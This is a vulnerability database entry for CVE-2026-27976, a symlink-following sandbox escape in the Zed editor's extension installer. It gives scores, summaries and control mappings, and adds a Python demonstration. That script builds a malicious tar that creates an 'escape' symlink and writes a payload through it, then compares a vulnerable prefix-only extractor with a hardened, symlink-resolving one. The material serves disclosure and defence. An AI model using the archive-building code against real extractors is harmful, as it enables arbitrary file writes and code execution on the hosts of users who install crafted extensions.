Cyber Posture

CVE-2026-27976

Severity: High · Public PoC

Published: 26 February 2026
Modified: 05 March 2026
KEV Added: (none)
Patch: 0.224.4
CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
EPSS Score: 0.0011 (28.3rd percentile)
Risk Priority: 18 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Description

Zed, a code editor, has an extension installer that downloads extensions as tar/gzip archives. Prior to version 0.224.4, the tar extractor (`async_tar::Archive::unpack`) creates symlinks from the archive without validation, and the path guard (`writeable_path_from_extension`) only performs lexical prefix checks without resolving symlinks. Because entries are processed in archive order, an attacker can ship a tar that first creates a symlink inside the extension workdir pointing outside it (e.g., `escape -> /`), then writes files through that symlink; each file path still begins with the workdir prefix, so the guard accepts it, and the write lands on an arbitrary host path. This escapes the extension sandbox and enables code execution. Version 0.224.4 patches the issue.

Mitigating Controls (NIST 800-53 r5) (AI-generated)

- prevent: Requires validation of tar/gzip archive inputs to prevent malicious symlinks from bypassing path guards during extension unpacking.
- prevent: Restricts and scans user-installed software such as Zed extensions to block installation of malicious tar archives exploiting symlink vulnerabilities.
- prevent: Mandates timely flaw remediation by applying patches such as Zed version 0.224.4 to fix the symlink handling and path validation issues.

Security Summary (AI-generated)

CVE-2026-27976 is a symlink following vulnerability (CWE-61) in the Zed code editor's extension installer, affecting versions prior to 0.224.4. The issue stems from the tar extractor (`async_tar::Archive::unpack`) creating symlinks from tar/gzip archives without validation, combined with the path guard (`writeable_path_from_extension`) performing only lexical prefix checks without resolving symlinks. This allows malicious archives downloaded during extension installation to bypass sandboxing restrictions.

An attacker can exploit this remotely over the network without prior privileges by crafting a tar archive for a malicious extension. The archive first creates a symlink within the extension workdir pointing to an arbitrary host path (e.g., `escape -> /`), followed by files written through that symlink; the lexical guard sees only a path that starts with the workdir prefix, so the writes land outside the sandbox, enabling arbitrary file writes and potential code execution on the host. Exploitation requires user interaction to install the extension, reflected in the UI:R component of the CVSS v3.1 vector (8.8, AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

Zed version 0.224.4 patches the vulnerability by addressing the symlink handling in the extractor and path validation. Additional details are available in the GitHub Security Advisory at https://github.com/zed-industries/zed/security/advisories/GHSA-59p4-3mhm-qm3r.
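The symlink-then-write sequence described in the Description and restated in the Security Summary, as an added worked example (this is not Zed's code, nor code from the advisory): a Python script that constructs an archive of that shape, runs it through a prefix-only guard modelled on the behaviour the advisory attributes to `writeable_path_from_extension`, and then through a guard that resolves symlinks before comparing. The function names, the scratch directories and the archive contents are all constructed for the illustration; the real attack points the symlink at `/`, whereas the demo points it at a sibling temp directory so it is harmless to run.

```python
import io
import os
import tarfile
import tempfile


def build_malicious_tar(link_target: str) -> bytes:
    """Constructed sample archive in the shape the advisory describes: entry 1
    is a symlink 'escape' pointing outside the workdir, entry 2 is a regular
    file whose path passes through it. The real attack uses '/' as target."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("escape")
        link.type = tarfile.SYMTYPE
        link.linkname = link_target
        tar.addfile(link)
        payload = b"#!/bin/sh\necho pwned\n"
        member = tarfile.TarInfo("escape/payload.sh")
        member.size = len(payload)
        member.mode = 0o755
        tar.addfile(member, io.BytesIO(payload))
    return buf.getvalue()


def lexical_guard(workdir: str, rel: str) -> bool:
    """Prefix-only guard (the flawed pattern): collapses '..' but never asks
    the filesystem where the path actually leads."""
    workdir = os.path.abspath(workdir)
    candidate = os.path.normpath(os.path.join(workdir, rel))
    return candidate == workdir or candidate.startswith(workdir + os.sep)


def resolved_guard(workdir: str, rel: str) -> bool:
    """Hardened guard: resolve symlinks on both sides, then compare."""
    root = os.path.realpath(workdir)
    final = os.path.realpath(os.path.join(workdir, rel))
    return os.path.commonpath([root, final]) == root


def unpack_vulnerable(tar_bytes: bytes, workdir: str) -> list:
    """Extract in archive order: symlinks are created verbatim, regular files
    are only checked lexically, so a file routed through an earlier symlink
    lands outside workdir. Returns the resolved paths actually written."""
    written = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for m in tar:
            dest = os.path.join(workdir, m.name)
            if m.issym():
                os.symlink(m.linkname, dest)  # linkname is never validated
            elif m.isreg():
                if not lexical_guard(workdir, m.name):
                    raise ValueError(f"rejected {m.name}")
                os.makedirs(os.path.dirname(dest), exist_ok=True)
                with open(dest, "wb") as f:
                    f.write(tar.extractfile(m).read())
                written.append(os.path.realpath(dest))
    return written


def unpack_hardened(tar_bytes: bytes, workdir: str) -> list:
    """Reject symlinks whose resolved target leaves workdir and check every
    entry against the resolved path before touching the filesystem."""
    written = []
    root = os.path.realpath(workdir)
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for m in tar:
            if not resolved_guard(workdir, m.name):
                raise ValueError(f"path escape: {m.name}")
            dest = os.path.join(workdir, m.name)
            if m.issym():
                target = os.path.realpath(
                    os.path.join(os.path.dirname(dest), m.linkname))
                if os.path.commonpath([root, target]) != root:
                    raise ValueError(f"symlink escape: {m.name} -> {m.linkname}")
                os.symlink(m.linkname, dest)
            elif m.isreg():
                os.makedirs(os.path.dirname(dest), exist_ok=True)
                with open(dest, "wb") as f:
                    f.write(tar.extractfile(m).read())
                written.append(os.path.realpath(dest))
    return written


def demo() -> dict:
    """Run both extractors against the same archive in a scratch tree."""
    base = tempfile.mkdtemp(prefix="cve-2026-27976-demo-")
    outside = os.path.join(base, "outside")  # stands in for '/' on a real host
    os.mkdir(outside)
    archive = build_malicious_tar(outside)
    vuln_dir = os.path.join(base, "vuln_workdir")
    os.mkdir(vuln_dir)
    vuln_written = unpack_vulnerable(archive, vuln_dir)
    hard_dir = os.path.join(base, "hard_workdir")
    os.mkdir(hard_dir)
    try:
        unpack_hardened(archive, hard_dir)
        hardened_error = None
    except ValueError as exc:
        hardened_error = str(exc)
    outside_real = os.path.realpath(outside)
    return {
        "lexical_guard_passes": lexical_guard(vuln_dir, "escape/payload.sh"),
        "resolved_guard_passes": resolved_guard(vuln_dir, "escape/payload.sh"),
        "vuln_wrote_outside": bool(vuln_written)
        and os.path.commonpath([outside_real, vuln_written[0]]) == outside_real,
        "hardened_error": hardened_error,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two points the run makes visible. The lexical guard accepts `escape/payload.sh` before and after the symlink exists, because it only looks at the string; the resolving guard accepts it before the symlink exists and rejects it afterwards, which is why the hardened extractor must also validate symlink targets at creation time rather than relying on the per-file check alone. Resolving both sides with `realpath` also keeps the comparison correct on hosts where the workdir itself sits under a symlinked path (for example `/tmp` on macOS).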

Details

CWE(s)

CWE-61 UNIX Symbolic Link (Symlink) Following

Affected Products

zed / zed: versions < 0.224.4 (fixed in 0.224.4)

MITRE ATT&CK Enterprise Techniques (AI-generated)

T1204.002 User Execution: Malicious File
An adversary may rely upon a user opening a malicious file in order to gain execution.

Why these techniques?

Symlink validation bypass in the extension tar unpacker enables arbitrary file write and code execution when a user installs an attacker-crafted extension archive (direct match to malicious file execution, consistent with UI:R in the CVSS vector).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

References

- GitHub Security Advisory GHSA-59p4-3mhm-qm3r: https://github.com/zed-industries/zed/security/advisories/GHSA-59p4-3mhm-qm3r